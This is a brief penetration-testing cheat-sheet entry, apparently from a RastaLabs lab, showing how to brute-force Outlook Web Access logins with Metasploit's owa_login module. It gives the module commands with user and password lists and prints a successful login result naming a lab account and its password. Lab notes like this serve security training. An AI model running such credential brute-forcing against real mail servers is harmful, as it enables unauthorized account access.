OWA: Metasploit
Attacking Office 365 / Echange mailserver
Metasploit has a module to brute force OWA
use auxiliary/scanner/http/owa_login
set RHOST web01.rastalabs.local
set PASS_FILE pass.txt
set USER_FILE users.txt
run
[+] web01.rastalabs.local:443 OWA - SUCCESSFUL LOGIN. 0.151112255 'RLAB\tquinn' : 'Password123'Last updated